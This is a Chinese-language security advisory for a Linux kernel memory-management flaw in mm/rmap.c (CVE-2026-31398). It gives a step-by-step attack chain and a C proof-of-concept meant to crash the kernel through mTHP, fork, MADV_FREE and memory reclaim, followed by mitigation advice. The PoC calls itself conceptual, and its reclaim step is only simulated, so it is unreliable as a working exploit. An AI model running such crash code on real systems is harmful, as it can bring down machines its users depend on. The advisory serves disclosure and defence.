CVE-2026-31398 Linux内核rmap内存管理权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-31398

漏洞类型

内存管理错误

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核内存管理子系统中存在一个高危漏洞，具体位于反向映射（rmap）模块。该漏洞源于在批量取消映射匿名lazyfree folio时，未能正确区分可写和不可写的页表项（PTE）。当处理包含混合权限的PTE批次时，系统可能会错误地将整个批次设置为可写状态。此外，在PTE恢复过程中，soft-dirty位也未被正确保留。该缺陷违反了写时复制（CoW）的内存语义，可能导致内核崩溃（Oops），或在特定条件下被利用于权限提升，允许非特权用户破坏内核内存完整性。

技术细节

漏洞发生在 `mm/rmap.c` 的 `folio_unmap_pte_batch` 函数中。在处理 `MADV_FREE` 标记的lazyfree大页时，如果批次中混合了可写（writable）和不可写（read-only）的PTE，当前的逻辑会错误地将整个批次视为可写进行恢复。这导致在内存回收路径中，一个可写的匿名页被映射到了多个进程的页表中，触发了 `page_table_check_set` 中的 `BUG_ON(atomic_inc_return(&ptc->anon_map_count) > 1 && rw)` 断言失败。攻击者可以通过特定的内存操作序列（如设置mTHP、分割VMA、fork、合并VMA并触发回收）来触发此路径，从而造成系统崩溃或潜在的越权读写。

攻击链分析

STEP 1

步骤1: 内存布局准备

攻击者配置系统以支持64K mTHP，并分配一个大页内存，然后通过madvise(MADV_DONTFORK)在中间点分割VMA。

STEP 2

步骤2: 创建混合权限状态

执行fork()操作，使得父进程拥有包含8个可写PTE和8个不可写PTE的混合状态。随后使用MADV_DOFORK合并VMA。

STEP 3

步骤3: 标记Lazyfree与写入

对内存范围应用MADV_FREE，将其标记为lazyfree。随后对内存进行写入操作，使PTE变脏并触发rmap更新。

STEP 4

步骤4: 触发内存回收

通过施加内存压力或调用特定接口触发内核内存回收机制，迫使内核执行PTE恢复路径。

STEP 5

步骤5: 触发漏洞利用

内核在批量恢复PTE时，错误地将混合权限批次全部设为可写，违反CoW语义，触发BUG_ON导致崩溃或实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31398
 * Conceptual Reproducer based on vulnerability description.
 * Requires specific kernel configuration (64K mTHP enabled).
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

#define MAP_SIZE (64 * 1024) // 64K mTHP

void trigger_crash() {
    // 1. Allocate and fault in a 64K large folio
    char *mem = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, 
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return;
    }
    memset(mem, 'A', MAP_SIZE); // Fault in

    // 2. Split the VMA at mid-point with MADV_DONTFORK
    madvise(mem, MAP_SIZE / 2, MADV_DONTFORK);

    // 3. fork() to create parent with mixed writable/non-writable PTEs
    pid_t pid = fork();
    if (pid == 0) {
        // Child process logic
        pause(); 
    } else {
        // Parent process
        // 4. Merge the VMAs with MADV_DOFORK
        madvise(mem, MAP_SIZE, MADV_DOFORK);

        // 5. MADV_FREE on the range to mark as lazyfree
        madvise(mem, MAP_SIZE, MADV_FREE);

        // 6. Write to memory to dirty the PTE
        memset(mem, 'B', MAP_SIZE);

        // 7. Trigger reclaim (simulated)
        // In a real scenario, allocate memory to pressure the system
        // or use the specific reclaim interface mentioned in the trace.
        printf("Triggering memory pressure to hit reclaim path...\n");
        
        // Allocate until OOM or trigger specific reclaim syscalls
        size_t huge_alloc = 1024 * 1024 * 1024; 
        void *leak = malloc(huge_alloc);
        if (leak) memset(leak, 0, huge_alloc);
        
        wait(NULL);
    }
}

int main() {
    printf("Starting PoC for CVE-2026-31398\n");
    trigger_crash();
    return 0;
}

影响范围

Linux Kernel < 7.0 (Specific commits fix this)

Linux Kernel 6.x (potentially vulnerable depending on backport)

防御指南

临时缓解措施

建议立即更新官方内核补丁。在无法立即升级的情况下，可以通过禁用透明大页（THP）或限制mTHP的使用来降低被攻击的风险，但这可能会对系统性能产生一定影响。